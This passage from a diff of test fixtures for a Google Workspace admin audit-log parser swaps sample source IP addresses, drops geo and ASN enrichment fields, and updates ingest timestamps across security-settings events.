"2021-12-09T13:38:53.079532100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALLOW_STRONG_AUTHENTICATION", "id": "1", @@ -93,7 +75,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -119,35 +101,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351375Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079537900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ALLOW_SERVICE_FOR_OAUTH2_ACCESS", "id": "1", @@ -178,7 +142,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -204,35 +168,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351377Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079543500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "DISALLOW_SERVICE_FOR_OAUTH2_ACCESS", "id": "1", @@ -263,7 +209,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -287,35 +233,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351378900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079548Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID", "id": "1", @@ -346,7 +274,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -370,35 +298,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351380600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", + "ingested": "2021-12-09T13:38:53.079553600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "ADD_TO_TRUSTED_OAUTH2_APPS", "id": "1", @@ -428,7 +338,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -452,35 +362,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351382500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", + "ingested": "2021-12-09T13:38:53.079558700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "REMOVE_FROM_TRUSTED_OAUTH2_APPS", "id": "1", @@ -510,7 +402,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -536,35 +428,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351384300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079563900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "BLOCK_ON_DEVICE_ACCESS", "id": "1", @@ -594,7 +468,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -618,35 +492,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351386200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079570300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION", "id": "1", @@ -677,7 +533,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -701,35 +557,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351388300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079576700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_FREQUENCY", "id": "1", @@ -760,7 +598,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -784,35 +622,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351390300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079583Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION", "id": "1", @@ -843,7 +663,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -867,35 +687,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351392100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079589500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_START_DATE", "id": "1", @@ -926,7 +728,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -950,35 +752,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351394Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", + "ingested": "2021-12-09T13:38:53.079596200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", "provider": "admin", "action": "CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS", "id": "1", @@ -1009,7 +793,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1031,35 +815,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351395800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:53.079602500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_CAA_ENABLEMENT", "id": "1", @@ -1089,7 +855,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1111,35 +877,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351397500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079608800Z", + "original": 